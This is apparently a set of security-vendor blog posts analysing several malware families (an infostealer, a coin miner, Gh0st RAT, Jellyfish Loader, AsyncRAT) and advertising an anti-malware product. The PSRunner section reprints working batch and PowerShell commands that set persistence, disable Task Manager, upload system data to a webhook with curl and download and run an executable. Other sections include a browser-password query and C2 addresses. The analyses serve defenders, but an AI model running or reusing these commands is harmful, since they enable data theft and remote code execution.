Win64/Reflo.HNS!MTB Overview

Trojan:Win64/Reflo.HNS!MTB is a heuristic detection used by Microsoft Defender to detect a specific type of malware. This malware is a type of spyware and can actively collect sensitive information, such as user credentials, from the victim’s system. Heuristic detection is used when malware has certain characteristics and behavioral patterns that match known threats, but it may not have a matching signature in the antivirus database.

After the execution, Reflo Trojan will start its malicious activity immediately, with the primary goal of stealing confidential information. This can end up with your social media accounts to start sending spam messages, and banking accounts being drained. This type of malware is designed to operate stealthily, so its presence is usually difficult to detect. In most cases, the victim only discovers it when significant damage has already been done, such as aforementioned unauthorized access to online accounts.

As with most similar threats, Trojan:Win64/Reflo.HNS!MTB is often spread via pirated software. Repackers, modders, and websites that distribute pirated games, cracked programs, or mods may add it as a hidden addition to their repacks. It can also spread through email attachments, malicious links, or accidental downloads on compromised websites. However, the main source of this threat is questionable game mods.

Technical Analysis

Now let’s see how this malware behaves on a compromised system. As mentioned earlier, this virus is mainly distributed via game mods. This suggests that any detections might be false positives by default. Although the user won’t notice anything visually, clicking “allow” triggers certain processes in the system.

The process begins with the following command:

"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && start /wait ^"^" ^"C:\Users\\AppData\Local\Temp\Appname/Setup.bat^"
C:\Windows\system32\cmd.exe /K "C:\Users\\AppData\Local\Temp\Appname/Setup.bat
python Setup.py

Next, the malware checks for the presence of a sandbox or virtual environment and fingerprints the system. To do this, it checks the following registry keys:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ActiveComputerName

This is a standard procedure for malware that prevents the threat from running in a virtual environment. In addition, Trojan:Win64/Reflo.HNS!MTB uses some tricks to prevent dynamic analysis.

Payload

The following commands are used by the Reflo Trojan to drop and unpack the payload:

"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\RedTiger-Tools-main.zip"
7620 - C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\cjov35ys.mq0" "C:\Users\user\Desktop\Appname.zip"
7660 - C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

The malware drops many files into the Windows temporary directory C:\Users\user\AppData\Local\Temp\, including many “.py” files that are necessary for the malware to work.

Credential Access

The next step is to collect confidential information. This is done by creating a DirectInput object that enables the malware to read keystrokes. In this way, attackers can intercept usernames and passwords that the victim enters on their device. Once the user authorizes the execution of this threat, it can run in the background for an extended period. The malware is extremely stealthy, and the name of the executable can be random. Therefore, the user is unlikely to realize why they can no longer log into their account.

Besides keylogging, the hijacker also collects confidential data already stored on the system. Among other things, the malware can collect cookies, saved passwords, and credit card information from autocomplete forms in popular browsers. Even though the latest versions of browsers encrypt this information in encrypted form, it does not protect it completely. The malware can also collect cookies, saved passwords, and credit card information from autocomplete forms in popular browsers. Typically, the query looks like this:

SELECT action_url, username_value, password_value FROM logins

Almost always, infostealer malware like Reflo.HNS!MTB targets the most popular web browsers. Chrome, Chromium, Opera, Firefox and some of the popular alternatives to the mainstream applications are among the target list. Still, using the no-name browser won’t always secure you: malware masters can easily adjust the list of applications their virus will extract credentials from.

C2 Connection

The malware communicates with multiple addresses on the internet, but certain addresses are of particular interest. Specifically, it attempts to connect to .onion addresses, which are associated with the Darknet. Our instance is trying to connect to:

3bp7szl6ehbrnitmbyxzvcm3ieu7ba2kys64oecf4g2b65mcgbafzgqd.onion
55niksbd22qqaedkw36qw4cpofmbxdtbwonxam7ov2ga62zqbhgty3yd.onion
7mejofwihleuugda5kfnr7tupvfbaqntjqnfxc4hwmozlcmj2cey3hqd.onion
ajlu6mrc7lwulwakojrgvvtarotvkvxqosb4psxljgobjhureve4kdqd.onion

These are just a few of the addresses, but in addition to darknet sites, the malware tries to connect to URLs related to Discord, Telegram, Mastodon or similar social networks. That tactic allows frauds to mask the final command servers, as the corresponding user profiles will contain nothing but the link to the “main” C2.

How To Remove Trojan:Win64/Reflo.HNS!MTB?

To remove Trojan:Win64/Reflo.HNS!MTB, it’s essential to use an advanced anti-malware solution. I recommend GridinSoft Anti-Malware, as it can offer permanent protection against most threats in addition to cleaning. The first step is to scan your system and remove all detected threats. To do this, follow the instructions below:

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

After removing the threats, be sure to change your account passwords and terminate any suspicious sessions. This step is crucial to prevent attackers from regaining access to compromised accounts.

The post Trojan:Win64/Reflo.HNS!MTB appeared first on Gridinsoft Blog.

Altisik Service Overview

Altisik Service is a malicious coin miner masquerading as a legitimate Windows process. It is used for hidden illegal cryptocurrency mining, thereby creating a significant load on the processor (up to 80% or 100%). However, this miner differs in one key aspect – it registers itself in the system as a service. As a result, hackers ensure their malware’s increased sustainability. Attempts to manually stop or delete the service can lead to critical system failures, potentially causing a “blue screen of death”.

Attackers choose the form of a service for their malware not only for the sake of sustainability. Unlike executable files, services are suspected of malicious activity much less often, simply because users trust them more. Also, Windows services can get higher privileges much more easily, and with less suspicion from security software.

As for the distribution method, users on Reddit report receiving Altisik as an unwanted “bonus” with other software. Miners generally enter systems disguised as bundled software within installers of cracked programs. Another method is through additional malware already present on the computer: vast loader malware botnets can offer huge gains for the operators of malicious coin miners.

Technical Analysis

Let’s have a closer look at the behavior of the Altisik miner. At the beginning, it is rather typical for a coin miner: upon launching itself, Altisik initially checks for a virtual environment and security mechanisms. Specifically, it checks the following locations:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\Drivers
HKEY_CURRENT_USER\Software\Microsoft\DirectX\UserGpuPreferences

Further, it pays special attention to Windows Defender settings, specifically ones that touch real-time protection. The malware checks the following system sections.

C:\Program Files\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\PassiveMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

The sample employs stalling tactics, including long periods of inactivity, to hinder dynamic analysis. This also helps with circumventing some of the antivirus sandboxes: seeing no activity, one will report that the file is safe.

Persistence and Privilege Escalation

Next, the miner maintains persistence in the system as a service, which grants it elevated privileges. It executes the following shell commands:

"C:\Windows\system32\rundll32.exe" "C:\Users\\AppData\Local\Temp\AltisikDevPL/AltisikHelper.dll",#1
C:\Windows\system32\SecurityHealthService.exe
C:\Windows\system32\WerFault.exe -u -p 4328 -s 548
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

As you can see, it runs the AltisikHelper.exe and AltisikHelper.dll processes. They are needed to prevent the user from manually stopping the mining process. Further analysis revealed that the miner creates a DirectInput object, which allows it to read keystrokes. It is unlikely that the Altisik miner can act as a keylogger, but there are quite a few other applications for input capturing.

C2 Connection

Altisik uses network communication to send and receive data necessary for its mining operations. The miner communicates with the api.altruistics.org server, likely used for monitoring, control, or data transmission. This may include the miner’s status, statistics, or other mining-related parameters. The response is in text/html format, indicating that the server is returning a web page or text-based data. It also uses Cloudflare DNS 104.18.7.80 and 104.18.6.80, potentially complicating traffic analysis.

How To Remove Altisik?

To get rid of Altisik service, I recommend using GridinSoft Anti-Malware – an effective and easy-to-use antivirus, that will quickly repel any threats present in the system. Though first, I would recommend entering Safe Mode with Networking: go to the Start menu → click Reboot while holding down the Shift button on the keyboard.

When your PC reboots, in the menu that appears after restarting, select “Troubleshoot” → “Advanced options” → “Startup Settings” → “Restart”.

Next, select the Safe Mode with Networking and press the corresponding key (usually F5, though it may vary depending on your Windows version).

Hint: If you have any problems with switching to Safe Mode, please read our guide: How to Remove a Virus From a Computer in Safe Mode.

After switching to the Safe Mode with Networking, follow the steps below:

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Altisik Service Virus appeared first on Gridinsoft Blog.

Malware on Porn Website: Reality or Myth?

Contrary to popular belief, visiting porn sites doesn’t automatically result in getting infected with viruses or malware. While threats can indeed come from porn sites, they are usually the result of specific interactions with malicious content rather than simply visiting the site. And things that one may get from an adult site rarely fit into the classic definition of malware: it is more on the side of junkware and malicious extensions.

To bring in more details, we need to clarify what we mean by “porn sites”. The fact is, there are two types of porn sites: legit, renowned ones, that have subscription services and overall are well-recognized, and shady pages that may stick to random monetization options. In this case, the risk of getting malware on porn website is not higher than, say, on YouTube. And overall, they do not have any motivation to switch to malignant activity: subscription price multiplied by the volume of users gives more than enough profit.

The story is different for those shady sites. Unlike the former, they may range from being as well safe, or bear significant malware threat. Since the main objective of such sites is to make money as quickly as possible, the presence or absence of malware or viruses on a site only depends on how deep down the rabbit hole the site masters are ready to dive. Let’s take a closer look at how this works.

Why Do Some Porn Sites Have Viruses?

The main way shady sites make money is through advertising, or dirty traffic arbitrage tricks. In simple terms, the latter is when a shady actor buys traffic (visitors) at one price and then redirects those visitors to other sites where they are paid more. Thing is – these actors rarely care about the end site being safe for the user. And that is the source of all the further dangers for them.

Best bidders of that scheme are ones who will make money on the user with the biggest chance. And those are most often malicious actors or someone who trick people into doing a compromising action. This gives out the list of potential threats: phishing sites, malware distributing pages, pop-up ads spam pages and so on.

Malware Threats From Porn Sites

Now that we’ve established why porn sites might contain threats or malware, let’s discuss the risks and consequences of visiting such sites. Beyond exposing people to malware, there are several other risks, including the collection of confidential information, financial loss, and even psychological harm.

Redirects

Automatic redirects are a main source for most of the threats we’ve discussed. They can lead users to websites that host malware, engage in fraudulent schemes, or display aggressive advertising. Low-quality sites often use this tactic for several reasons: firstly, they engage in mutual promotion by redirecting users from one site to another. This often appears as a “Play” button, which, when clicked, takes the user to a different site, creating a loop of endless redirections. A single click can open 3-4 windows at once, and an unsuspecting user may keep going through these sites, getting deeper and deeper into the malware scam.

In some cases, one of these windows may immediately start downloading a file, which is often malicious. The file might have a double extension, such as video.mp4.exe for desktop systems, or a fake app like player.apk for mobile devices. Another variation of this tactic involves sites attempting to install malicious browser plugins. This usually presents as the browser prompting the user to install a necessary extension for the site to function properly. And, you guessed it right, none of the programs/extensions spread in such a way are safe.

Malicious Advertisements and Push Notification Spam

Another related threat involves websites attempting to gain permission to send notifications. This works by tricking the user into allowing notifications when they try to interact with a site element, like a “Play” button. The site might request the user to confirm they’re not a robot by granting notification permissions. As a result, the site bombards the user with spam notifications, mostly filled with annoying ads but occasionally containing potentially harmful content.

Although these notifications may seem merely annoying at first glance, they carry certain risks. First, these notifications often lead to sites that feature aggressive advertising, fraudulent offers, or illegal content. This can include redirects to sites offering fake discounts, dangerous programs, or even bogus free downloads. As mentioned earlier, these downloads may include various forms of malware – from adware to spyware or even backdoors. Once installed, the malware can steal confidential data, encrypt all files on the device, or even use the system as part of a botnet, depending on its payload.

Data Collection

There is a specific category of adult sites that threaten users not with the probability of redirection to a malicious website, but with the excessive data collection. In fact, it is not a straightforward malware on porn website, but a threat related to such site. I am talking about sketchy dating sites, ones that offer finding a pair for short-living intercourse-targeted relationships. Typically for any dating, one should fill in the information about themselves, all the way up to real address, phone number and personal photos. And that is where the danger kicks in.

You see, large dating platforms, same as any sites that handle massive amounts of sensitive data, invest a lot of resources to set up proper data protection. For a questionable dating page that was established a week ago, these resources are non-existent. Moreover, some of these sites ask for payment immediately after registration.

It’s worth noting that most of the profiles on these sites are fake, as we can see in the image below. Therehence, a chance of a bad actor getting their hands on all the user data, or just the site owner themself selling it to someone on the Darknet is rather high. Further, such detailed information may be on hand for threat actors in various types of phishing attacks, where they can impersonate the authority. And with all the information from such a site, it will be a rather convincing impersonation.

How to Stay Safe?

There are several tips to adhere to avoid malware risks and other threats when browsing adult sites. Though, same rules apply to a lot of other site categories, so they may be useful for much more situations.

First, avoid visiting questionable no-name sites. If you do want to view adult content, stick to well-known sites that don’t pose a threat (ask a friend for recommendations). Never download anything from these sites, don’t allow notifications, and avoid installing any extensions or add-ons. Also, refrain from sharing any personal information with websites you don’t trust.

Second, use specialized tools to protect your device from potential threats. I recommend using GridinSoft Anti-Malware, as it guards against common cyber threats and includes an Internet Security module. This will greatly reduce the chances of malware infiltrating your device. Lastly, use a proper, time-proven ad blocking extensions. They disable advertisements for free, thus decreasing malware risks by orders of magnitude.

The post Can You Get a Virus By Visiting a Porn Site? appeared first on Gridinsoft Blog.

Gh0st RAT Trojan Targets Chinese Windows Users

In early June, cybersecurity researchers discovered a malicious campaign targeting users from China. Threat actors are spreading Gh0st RAT using the malware dropper Gh0stGambit, which finds its way to user devices through a phishing site chrome-web[.]com. The attackers employed a drive-by download. They offered users a Google Chrome installer file on a page that appeared to be a legitimate Chrome downloading site. However, the MSI installer downloaded from the fake site contains two files: the legitimate Chrome installation executable and the malicious installer WindowsProgram.msi, which is used to execute shell code responsible for downloading Gh0stGambit.

Gh0st RAT is a long-standing piece of malware from the arsenal of APT27, with its source code made publicly available in 2008. According to sources, its command infrastructure was primarily based in the People’s Republic of China. Written in C++, it has appeared in various forms over the years, primarily in campaigns organized by China-linked cyber espionage groups. Researchers report that a modified variant of Gh0st RAT was used in campaigns by the hacker group in 2018.

Some Details

The exact attack happens in a multi-staged manner. Before carrying out its primary task, Gh0stGambit checks the system for anti-malware software, such as Microsoft Defender or 360 SafeGuard. If it detects these programs, it adds its folder to their exclusions. Then it connects to a command and control server at hxxp://pplilv.bond/d4/107.148.73[.]225/reg32 and initiates the download of Gh0st RAT.

Gh0st RAT is delivered in encrypted form disguised as a Registry Workshop. In addition to providing remote access, it can collect information (keylogging, screen capturing, etc.). Moreover, it contains an embedded rootkit that allows it to hide certain system elements, such as the registry or directories.

It can also can drop Mimikatz in the system folder, enable RDP on compromised hosts, gain access to account identifiers associated with Tencent QQ, clear Windows event logs, and erase data from 360 Secure Browser, QQ Browser, and Sogou Explorer.

It is rather unusual to see malware with allegedly Chinese origin to attack users from mainland China. Typically threat actors keep away from attacking anything or anyone within their country, as it makes the distance to law enforcement too short. Thing is – it is not just regular malware, but a toolkit for spying on citizens. And earlier, APT27 was seen doing exactly this to Chinese citizens, both on the mainland and on Taiwan.

How to protect your system?

Such staged, multi-component attacks require advanced security software to protect against. Aside from excellent real-time and database-backed protection, it should also feature a network protection system that may filter out phishing sites like the one used in this campaign. All this is available in GridinSoft Anti-Malware – check it out through the banner below.

The post Gh0st RAT Malware Attacks Chinese Users Via Fake Chrome Page appeared first on Gridinsoft Blog.

Trojan:BAT/PSRunner.VS!MSR Overview

Trojan:BAT/PSRunner.VS!MSR is a type of malware detection identifier used by Microsoft Defender antivirus. This heuristic detection applies to batch files (.bat), which are scripts that can execute a series of commands in Windows via PowerShell. Typically, it downloads and executes additional malicious software, making it a simplified version of a dropper. Although less flexible, PSRunner is still capable of making quite a mess in the system.

Typically, it is spread through email attachments in phishing campaigns. This is the most popular tactic, where emails appear to come from legitimate sources, prompting recipients to open the attachment or click on malicious links. Additionally, the trojan can be downloaded from pirate or malicious websites in the form of cheats and mods for games. In that case, the disguise is not an attachment, but the entire game installer that serves a shell around the malignant script.

Technical Analysis

Let’s delve deeper into how Trojan:BAT/PSRunner.VS!MSR behaves after it infiltrates a system. As a .bat file, it lacks advanced features like sandbox or debugger checks. However, it still attempts to operate as stealthily as possible to avoid detection by the user. Upon execution, it hides itself from the PowerShell window using the following command:

attrib +h +s %0

Persistence

Next, the malware takes steps to establish persistence in the system. It executes the following commands:

set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
echo start "" %0>>%SystemDrive%\auTOexec.baT
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDir%\%a%.bat /f > nul

By doing this, the malicious script creates multiple registry entries, enabling it to run at every system startup. Additionally, it copies the script to the user’s Startup folder to ensure it launches upon system login.

As mentioned earlier, this is simply a script using PowerShell. Unlike more advanced malware, it cannot hide in the Task Manager. This means the user can terminate the process by ending the PowerShell process in the Task Manager. Therefore, the malware’s next step is to disable the Task Manager. It adds the following registry key:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Gathering Information

Next, the malware collects various information about the system. This process is often referred to as system fingerprinting. In this case, the fingerprint is quite detailed. The malware executes the following command:

powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%usErPrOfiLE%\apps.txt"
curl -v -F "chat_id=-655682538" -F document=@%uSERPRoFILE%\apps.txt %WEbHooK%

This command saves a list of installed applications to a text file named apps.txt and sends it to a remote server. The script then gathers system information into a file named userdata.txt using the following commands:

echo Username %usERnAME% >> userdata.txt
echo IP %IPV4% >> userdata.txt
echo. >> userdata.txt
ipconfig >> userdata.txt
echo. >> userdata.txt
getmac >> userdata.txt
echo. >> userdata.txt
wmic cpu get caption name, deviceid, numberofcores maxclockspeed, status >> userdata.txt
echo. >> userdata.txt
wmic computersystem get totalphysicalmemory >> userdata.txt
echo. >> userdata.txt
wmic partition get name,size,type >> userdata.txt
echo. >> userdata.txt
systeminfo >> userdata.txt
echo. >> userdata.txt
wmic path softwareLicensingService get OA3xOriginalProductKey >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt

After gathering this information, it sends the file to a remote server with the following command:

cu rl -v -F "chat_id=-655682538" -F document=@%useRpRofIlE%\userdata.txt %WEBHOOk%
del userdata.txt
del apps.txt

By doing this, the malware retrieves and transmits extensive system details, including installed applications, network configurations, hardware specifications, and system information. Finally, it deletes the files userdata.txt and apps.txt to cover its tracks.

Payload

The final stage of the script’s execution involves running the following command:

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
start GetToken.exe
ping 127.0.0.1 3 > "e.txt"
start GetToken.exe

As we can see, the script uses PowerShell to download an executable file named GetToken.exe from Discord servers and then runs it. All the naming of the involved files are made to create the least suspicion.

How To Remove Trojan:BAT/PSRunner.VS!MSR?

To remove Trojan:BAT/PSRunner.VS!MSR, you need to use an advanced anti-malware solution with a heuristic module. Additionally, it is crucial to maintain continuous system protection to prevent future infections. GridinSoft Anti-Malware is an excellent choice because, in addition to proactive protection, it has an Internet Security module. This will block potentially unsafe sites, thus preventing the infection process at the earliest stage.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:BAT/PSRunner.VS!MSR appeared first on Gridinsoft Blog.

Jellyfish Loader Malware Overview

Researchers from Cyble have discovered a new Jellyfish Loader threat that stands out from other threats. The malicious file appears to originate from Poland and caught the attention of researchers because it differs from typical threats. The file is a zip archive containing a PDF document disguised as a Windows shortcut (.lnk). However, this is not just a regular shortcut. Once launched, this file initiates the downloading and execution of the malicious Jellyfish downloader. In a nutshell, it is a 64-bit .NET executable called BinSvc.exe, which we will discuss later.

This threat does not use obfuscation; instead, it utilizes the AsyncTaskMethodBuilder for asynchronous operations. This allows for efficient SSL certificate validation, ensuring secure communication with the command server (C&C). It also integrates dependencies using Fody and Costura, making it easy to work with and avoid detection. Once started, the loader collects basic information about the system, effectively fingerprinting infected machines. The downloader contains a function designed to perform shellcode execution, allowing it to process and execute shellcode received from a remote server.

Technical Analysis

Let’s take a closer look at how this malware behaves on an infected system. It enters the target system via phishing or spear phishing. As mentioned earlier, the threat is a double-extended zip archive named Lisa.pdf.zip, which has a similarly-named Lisa.pdf.lnk file in it. Once the file is opened, the following JavaScript is executed, which initiates the payload download:

“C:\Windows\System32\mshta.exe” “http://file.compute-ec2-aws.com/0d9cb9fe-5714-433c-aa58-0f26675979f0”

The .lnk file contains junk data to increase the file size and avoid detection artificially. Additionally, besides the main Jellyfish Loader payload, this JavaScript file loads a blank PDF decoy file with an image of a key and keychain in the form of a beaded cat.

Payload

Let’s omit the kitty picture and focus on the actual payload, the file located at C:\Users\user\AppData\Local\Microsoft\BinSvc.exe. This, in fact, is the Jellyfish Loader itself, downloaded by the script latched in a fake PDF file. After being launched, it creates the following value in the registry to set persistence:

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\LOAD
C:\Users\user\AppData\Local\Microsoft\BinSvc.exe

After launching, Jellyfish Loader collects the system fingerprint, which includes basic information about the system, saves it in JSON string format, and encrypts it with Base64. Types of data that it collects are as follows:

• unique runtime identifier
• unique build identifier
• program name
• program version
• host name
• user name
• domain
• system architecture
• operating system version
• process identifier

Command and Control

Next, the malware attempts to contact its command and control (C2) server, to report about the new infection and retrieve commands on further actions. It makes an HTTP POST request to one specific address – https://ping.connectivity-check.com. While looking legitimate, this site was in fact a part of other malware campaigns, particularly ones that were active during the past Olympic games.

Russian attacker Hades in the 2018 Olympic Destroyer operation, and used connectivity-check.com as a command server. It was involved in spreading a destructive online worm, designed to disrupt the 2018 Winter Olympics in Pyeongchang, South Korea. Also, this Jellyfish Loader shares certain code similarities with the Olympic Destroyer, such as shared coding styles and infrastructure. Considering that the 2024 Olympic Games in Paris are all set to start, Jellyfish Loader may be a part of the cyberattack campaign, too.

Safety Recommendations

As mentioned earlier, this threat is specific and requires an appropriate approach. Firstly, users must be vigilant when downloading and running questionable files. Tricks like double file extensions are designed to exploit human inattention.

Secondly, using an anti-malware solution with heuristic detection is an effective measure. Such solutions can prevent the execution of unauthorized shellcodes. I recommend GridinSoft Anti-Malware, as it includes this module. It also features an Internet Security module that can prevent malware from being downloaded at an early stage.

The post Jellyfish Loader Malware Discovered, Threatens 2024 Olympics appeared first on Gridinsoft Blog.

AsyncRAT Spreads in Fake eBook Files

The latest spreading campaign of AsyncRAT was described in detail by ASEC analysts. Fraudulent actors publish what originally looks like a downloading link for an archive that contains the desired book. As I’ve mentioned, the specific book that this website offers is not free, so it adds even more to the temptation of a user. After hitting the download button, they see a genuinely looking file, and click it, hoping to open the book.

But despite the expectation, nothing will ever happen. This file is only made to look like one of an ebook, and is in fact a disguised compressed file that triggers the chain of malicious events. Shall the user click on it, the file executes its script, launching a multi-stage malware loader. All the resources needed for the attack (except the final payload) are stored in this exact fake ebook file.

The first thing that is launched is a PowerShell script that initially checks the system for antivirus software. Then, it starts playing with the files in the archive, which only look as video files. In fact, they only have extensions of ones, being a VBS script under the bonnet. This first batch file collects system information and runs another VBS file that eventually downloads AsyncRAT from the command server. The other script creates another task in the Scheduler, and executes the final payload.

What is AsyncRAT?

AsyncRAT is an open-source remote access tool, that originally appeared on public in 2019. For obvious reasons, it is often weaponized by malicious actors. Even in its original design, it is a powerful toolkit for remote access and administration, with the application of encrypted connections during the session. AsyncRAT is capable of logging keystrokes, sending remote commands, controlling the attacked system and deploying malware.

As the source code is freely available, it is nearly impossible to trace a specific cybercrime gang that uses it in their attacks. In fact, AsyncRAT appears in both attacks on individuals and high-profile cyberattacks led by state sponsored actors. Open-source nature also adds to the flexibility of the payload. Functionality, detection evasion, capabilities for other malware delivery – they can alter pretty much anything. This is what makes not only AsyncRAT, but any open-source malware exceptionally dangerous.

How to protect against malware?

To stop the obfuscated malware spreading campaign like the one I’ve described above, I recommend using GridinSoft Anti-Malware. Its multi-component detection system will stop the attack even before the malicious file gets to the system, thanks to its superior online protection module.

The post AsyncRAT Spreads As Fake eBook Files, Uses LNK Files appeared first on Gridinsoft Blog.

Despite the clear dangers, many users still overlook the importance of safeguarding their computers with security software. The process of selecting, installing, and configuring an antivirus, not to mention the system resources it consumes, might seem daunting and unnecessary. However, it’s crucial to remember that safety measures, though they might appear excessive, prove their worth when you most need them.

Understanding Malware Protection

Let’s start by defining malware. The term “malware” — short for “malicious software” — encompasses a variety of harmful programs designed to infiltrate and damage computers. Besides malware, there are non-executable scripts and other network threats like phishing, which doesn’t rely on directly infecting a computer with programs.

Now let us see what malware does from the standpoint of the attacker. The list of damages types below may not be exhaustive, but it summarizes the harm hackers usually inflict by malware nowadays and the reason for such their activities.

Data Theft via Spyware

Hackers deploy spyware, a category of malware, to execute data theft. This group includes diverse programs with a common espionage function. For instance, keyloggers record all keystrokes, while rogue browsers spy on online activities. Their capabilities vary: some might only transfer your browsing history to third parties, while others can record keystrokes or intercept your internet traffic.

Beyond the immediate privacy invasion, spyware also consumes CPU resources in the background, slowing down your computer.

The most severe risk of spyware is identity theft, which can have devastating consequences, including the loss of financial credentials and all the money in your account.

Cryptocurrency Mining Malware

Specialized malware, often introduced to systems as Trojans or downloaded by other Trojans, exists solely to use the infected device’s resources for mining cryptocurrency for others. This process, which involves cryptographic tasks, is handled by the victim’s CPU.

Infected devices typically experience reduced processing speeds and slower internet connections as a result of these mining activities.

Botnet Involvement

Botnets are networks of malware-infected computers controlled remotely by hackers. This collective control allows hackers to perform large-scale operations like DDoS attacks or massive automated posting, activities that are impossible with a single machine. Furthermore, a botnet can propagate itself, potentially growing to tens of millions of infected devices.

For users, the signs of a botnet infection include an overloaded CPU and unexplained internet traffic, with most botnet activities occurring without their knowledge.

Adware: Turning Browsing into a Billboard

Adware encompasses a wide range of software, including overt malware and potentially unwanted applications (PUPs). Malicious adware transforms your browsing experience into a barrage of distractions, reminiscent of the Las Vegas Strip, with bright flashing banners constantly appearing and obstructing your view. Additionally, adware can embed advertisement links within the text of web pages you visit to provoke accidental clicks. Some adware even extends beyond your browser, displaying ads throughout the operating system.

Adware may manifest as easy-to-remove browser extensions, rogue browsers, or various “handy” applications. Some adware operates covertly, appearing only as unremarkable processes in your Task Manager.

The negative effects of adware are obvious and typically prompt users to cleanse their computers. If you find adware on your system, removing it is crucial, as its presence can lead to further malware infections.

Ransomware: Encrypting Data for Ransom

Ransomware is one of the most destructive types of malware. Once it infiltrates a device, it encrypts all data files of specific types, making access to these files impossible, and leaves a ransom note demanding payment in cryptocurrency. The note details the payment amount necessary for the decryption key, which cybercriminals typically provide after receiving the ransom—this ensures that future victims also pay, trusting the scheme will resolve their issues.

Ransomware attacks have become a highly profitable malware-based enterprise, generating millions in annual revenue for perpetrators and are now more rampant than ever. For more insights, read about the business model of ransomware.

Taking Control Over the System with Rootkits

Rootkits represent a particularly perilous class of malware due to their ability to grant hackers administrative-like control over a system. Found at rootkits, these programs are notorious for their capability to create a backdoor—an unauthorized pathway circumventing access controls. This backdoor allows hackers to issue commands directly from the core of the infected system, with potential damages limited only by the attackers’ objectives.

The threat of rootkits highlights the necessity for robust system security measures to detect and counteract such invasive control.

Recognizing Symptoms of Malware Infection

Understanding the symptoms of a malware infection is crucial for early detection and response. This section summarizes the key signs to watch for, regardless of the specific type of malware affecting your device. By paying close attention to these indicators, you may be able to identify the type of malware based on the symptoms alone.

• Slow PC and Crashing Programs: Various types of malware, especially those like cryptocurrency miners, operate in the background, consuming substantial system resources. This can noticeably decrease your PC’s performance and cause frequent program crashes.
• Lack of Storage: Some malware types use significant amounts of hard drive space, leaving insufficient room for your regular activities.
• Slow Internet: Malware can also degrade your Internet speed by generating background traffic that consumes your bandwidth.
• Spam Reports: If friends report spam from your email or social media accounts, it’s likely that malware has hijacked your accounts.
• Advertising Pop-ups: Unexpected ads and unfamiliar applications are common signs of adware infection. These can be both annoying and risky if they lead to inadvertent clicks.
• Weird Extensions Added to Data Files: This is a hallmark of ransomware. Encrypted files become inaccessible, and a ransom is demanded for their release— a harsh reminder of the dangers of online carelessness.

Not Only Malware Protection

Enhancing cybersecurity involves more than just installing software; it requires a proactive approach to safeguard your digital environment. Staying vigilant is crucial, especially within a workgroup. Educating your team on basic security principles can significantly reduce the risk of malware infections which often exploit human errors such as inattention and gullibility through social engineering tactics. For example, phishing attacks might not always carry malware directly, but they frequently aim to compromise devices as part of their strategy. You can learn how to recognize and avoid phishing scams to better protect yourself.

Another vital measure is to be wary of unknown email attachments, links, or banners. Malware commonly infiltrates systems through scripts embedded in files or websites that users inadvertently access. Regular updates to your operating system are also essential; they minimize vulnerabilities and boost the efficacy of antivirus solutions. Stay informed about the latest security practices to keep your system robust against threats.

